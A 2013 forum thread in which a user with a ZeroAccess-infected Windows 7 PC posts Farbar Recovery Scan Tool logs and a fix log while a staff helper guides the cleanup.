Need fixlist.txt for Farbar Recovery Scan Tool

Discussion in 'Malware Removal Assistance For Windows' started by Mr.LucianoSno, Nov 21, 2013.

Thread Status:
Not open for further replies.

Need Malware Removal Help?

We offer free malware removal assistance to our members. Sign Up now, and get free malware removal support.

  1. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Hi any help with this would be greatly appreciated

    Here is my FRST.txt file

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by SYSTEM on MININT-5L8G8QU on 21-11-2013 01:07:36
    Running from K:\
    Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Recovery

    The current controlset is ControlSet001
    ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM\...\Run: [MRT] - C:\Windows\System32\MRT.exe [80541720 2013-10-26] (Microsoft Corporation)
    HKLM\...\RunOnce: [*WerKernelReporting] - %SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq [415232 2009-07-13] (Microsoft Corporation)
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    HKU\Fabian Zayas\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - No File

    ==================== Services (Whitelisted) =================

    S2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    S2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    S3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    S1 MpKsl24c7195b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl24c7195b.sys [46768 2013-10-26] (Microsoft Corporation)
    S1 MpKsl71c12e8c; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl71c12e8c.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl7de8a784; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl7de8a784.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl81550350; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl81550350.sys [46768 2013-11-01] (Microsoft Corporation)
    S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    S3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav

    ==================== One Month Modified Files and Folders =======

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-21 00:13 - 2010-01-19 21:39 - 00000000 ____D C:\users\Fabian Zayas
    2013-11-21 00:13 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-18 00:00 - 2009-10-31 01:17 - 01296133 _____ C:\Windows\WindowsUpdate.log
    2013-11-17 23:58 - 2012-02-03 07:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-11-17 23:52 - 2013-03-06 22:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-11-17 23:40 - 2011-02-15 19:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-11-17 22:40 - 2011-02-15 19:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-11-17 20:58 - 2012-02-03 07:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-17 19:02 - 2013-10-21 16:36 - 00000362 _____ C:\Windows\Tasks\HPCeeScheduleForFabian Zayas.job
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 06:58 - 2009-07-13 21:13 - 00726444 _____ C:\Windows\System32\PerfStringBackup.INI
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-08 06:51 - 2010-01-29 07:38 - 410054500 _____ C:\Windows\MEMORY.DMP
    2013-11-08 06:51 - 2010-01-29 07:38 - 00000000 ____D C:\Windows\Minidump
    2013-11-08 06:51 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-11-08 06:51 - 2009-07-13 20:51 - 00191847 _____ C:\Windows\setupact.log
    2013-11-01 23:01 - 2013-04-30 11:44 - 00001945 _____ C:\Windows\epplauncher.mif
    2013-11-01 23:01 - 2013-04-30 11:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
    2013-11-01 23:01 - 2013-04-30 11:41 - 00000000 ____D C:\Program Files\Microsoft Security Client
    2013-10-31 05:59 - 2010-01-19 22:39 - 00000552 _____ C:\Windows\Tasks\PCDRScheduledMaintenance.job
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files\Microsoft Silverlight
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
    2013-10-26 23:20 - 2009-08-19 02:18 - 00348350 _____ C:\Windows\PFRO.log
    2013-10-26 23:00 - 2013-08-14 23:01 - 00000000 ____D C:\Windows\System32\MRT
    2013-10-26 23:00 - 2010-02-21 23:22 - 80541720 _____ (Microsoft Corporation) C:\Windows\System32\MRT.exe
    2013-10-26 12:02 - 2013-10-21 16:36 - 00003230 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFabian Zayas
    2013-10-25 16:36 - 2010-01-20 22:44 - 00000000 ____D C:\Users\Fabian Zayas\AppData\Roaming\HpUpdate
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav
    2013-10-22 22:04 - 2012-02-03 07:04 - 00002409 _____ C:\Users\Fabian Zayas\Desktop\Google Chrome.lnk
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003906 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

    ZeroAccess:
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    ATTENTION ====> Check for partition/boot infection.

    Files to move or delete:
    ====================
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\audacity-win-1.2.6.exe
    C:\Users\Fabian Zayas\switchsetup.exe
    C:\Users\Fabian Zayas\utorrent.exe


    Some content of TEMP:
    ====================
    C:\Users\Fabian Zayas\AppData\Local\Temp\50or.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\alw8tfq0.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\bitool.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\Bonjour64Setup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\bpuninstall.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\burnsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\default_pack_installer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\emhumjj-.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\ffmpeg15.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\FlashPlayer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\intrau3.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\oyhilrl7.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\tspohk6x.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\uninst.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\vpsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\wctikeq3.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\xtj1ygy9.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zfqyfyh4.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zipsetup.exe


    ==================== Known DLLs (Whitelisted) ================


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64

    ==================== EXE ASSOCIATION =====================

    HKLM\...\.exe: exefile => OK
    HKLM\...\exefile\DefaultIcon: %1 => OK
    HKLM\...\exefile\open\command: "%1" %* => OK

    ==================== Restore Points =========================

    19
    Restore point made on: 2013-10-28 23:00:15
    Restore point made on: 2013-10-29 23:00:15
    Restore point made on: 2013-10-30 23:00:14
    Restore point made on: 2013-10-31 23:00:15
    Restore point made on: 2013-11-01 23:00:24
    Restore point made on: 2013-11-02 23:00:20
    Restore point made on: 2013-11-03 00:00:16
    Restore point made on: 2013-11-08 06:53:45
    Restore point made on: 2013-11-09 00:00:26
    Restore point made on: 2013-11-10 00:00:15
    Restore point made on: 2013-11-11 00:00:14
    Restore point made on: 2013-11-12 00:00:15
    Restore point made on: 2013-11-13 00:00:15
    Restore point made on: 2013-11-14 00:00:15
    Restore point made on: 2013-11-15 00:00:15
    Restore point made on: 2013-11-16 00:00:15
    Restore point made on: 2013-11-17 00:00:15
    Restore point made on: 2013-11-18 00:00:15
    Restore point made on: 2013-11-19 00:00:14

    ==================== Memory info ===========================

    Percentage of memory in use: 19%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3197.69 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3217.93 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.87 MB

    ==================== Drives ================================

    Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 466 GB) (Disk ID: 1549F232)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    LastRegBack: 2013-11-09 21:03

    ==================== End Of Log ============================
     
  2. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Hi, I'll be working with you. We'll start here, and moderator will move this thread to appropriate forum.

    [attachment=6300]

    On your clean PC, download the following file by right-clicking it and select save as


    and save it onto your flash drive.

    Then, boot to system recovery, plug in your flash drive, open FRST and click fix. Post the generated log.

    Attempt to boot normally.
     

    Attached Files:

  3. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Thank you for your quick response.

    I attempted to boot normally and my computer still freezes on the same black screen.

    Here is my fixlog

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-11-2013
    Ran by SYSTEM at 2013-11-22 22:58:16 Run:1
    Running from K:\
    Boot Mode: Recovery
    ==============================================

    Content of fixlist:
    *****************
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\AppData\Local\Temp
    DeleteJunctionsIndirectory: C:\Windows\system64

    *****************

    eqcpqxgh => Service deleted successfully.
    rgqxleuo => Service deleted successfully.
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda => Moved successfully.
    C:\Windows\svchost.exe => Moved successfully.
    C:\ProgramData\0949343.pad => Moved successfully.
    C:\ProgramData\4v7x6c2B2.dat => Moved successfully.
    C:\Users\Fabian Zayas\AppData\Local\Temp => Moved successfully.
    Error: DeleteJunctionsIndirectory: C:\Windows\system64 => entry should be fixed outside recovery mode.

    ==== End of Fixlog ====
     
  4. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Can you re-run FRST and attach the fresh report...
     
  5. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by SYSTEM on MININT-5L8G8QU on 21-11-2013 01:07:36
    Running from K:\
    Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Recovery

    The current controlset is ControlSet001
    ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM\...\Run: [MRT] - C:\Windows\System32\MRT.exe [80541720 2013-10-26] (Microsoft Corporation)
    HKLM\...\RunOnce: [*WerKernelReporting] - %SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq [415232 2009-07-13] (Microsoft Corporation)
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    HKU\Fabian Zayas\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - No File

    ==================== Services (Whitelisted) =================

    S2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    S2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    S3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    S1 MpKsl24c7195b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl24c7195b.sys [46768 2013-10-26] (Microsoft Corporation)
    S1 MpKsl71c12e8c; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl71c12e8c.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl7de8a784; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl7de8a784.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl81550350; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl81550350.sys [46768 2013-11-01] (Microsoft Corporation)
    S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    S3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav

    ==================== One Month Modified Files and Folders =======

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-21 00:13 - 2010-01-19 21:39 - 00000000 ____D C:\users\Fabian Zayas
    2013-11-21 00:13 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-18 00:00 - 2009-10-31 01:17 - 01296133 _____ C:\Windows\WindowsUpdate.log
    2013-11-17 23:58 - 2012-02-03 07:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-11-17 23:52 - 2013-03-06 22:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-11-17 23:40 - 2011-02-15 19:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-11-17 22:40 - 2011-02-15 19:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-11-17 20:58 - 2012-02-03 07:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-17 19:02 - 2013-10-21 16:36 - 00000362 _____ C:\Windows\Tasks\HPCeeScheduleForFabian Zayas.job
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 06:58 - 2009-07-13 21:13 - 00726444 _____ C:\Windows\System32\PerfStringBackup.INI
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-08 06:51 - 2010-01-29 07:38 - 410054500 _____ C:\Windows\MEMORY.DMP
    2013-11-08 06:51 - 2010-01-29 07:38 - 00000000 ____D C:\Windows\Minidump
    2013-11-08 06:51 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-11-08 06:51 - 2009-07-13 20:51 - 00191847 _____ C:\Windows\setupact.log
    2013-11-01 23:01 - 2013-04-30 11:44 - 00001945 _____ C:\Windows\epplauncher.mif
    2013-11-01 23:01 - 2013-04-30 11:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
    2013-11-01 23:01 - 2013-04-30 11:41 - 00000000 ____D C:\Program Files\Microsoft Security Client
    2013-10-31 05:59 - 2010-01-19 22:39 - 00000552 _____ C:\Windows\Tasks\PCDRScheduledMaintenance.job
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files\Microsoft Silverlight
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
    2013-10-26 23:20 - 2009-08-19 02:18 - 00348350 _____ C:\Windows\PFRO.log
    2013-10-26 23:00 - 2013-08-14 23:01 - 00000000 ____D C:\Windows\System32\MRT
    2013-10-26 23:00 - 2010-02-21 23:22 - 80541720 _____ (Microsoft Corporation) C:\Windows\System32\MRT.exe
    2013-10-26 12:02 - 2013-10-21 16:36 - 00003230 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFabian Zayas
    2013-10-25 16:36 - 2010-01-20 22:44 - 00000000 ____D C:\Users\Fabian Zayas\AppData\Roaming\HpUpdate
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav
    2013-10-22 22:04 - 2012-02-03 07:04 - 00002409 _____ C:\Users\Fabian Zayas\Desktop\Google Chrome.lnk
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003906 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

    ZeroAccess:
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    ATTENTION ====> Check for partition/boot infection.

    Files to move or delete:
    ====================
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\audacity-win-1.2.6.exe
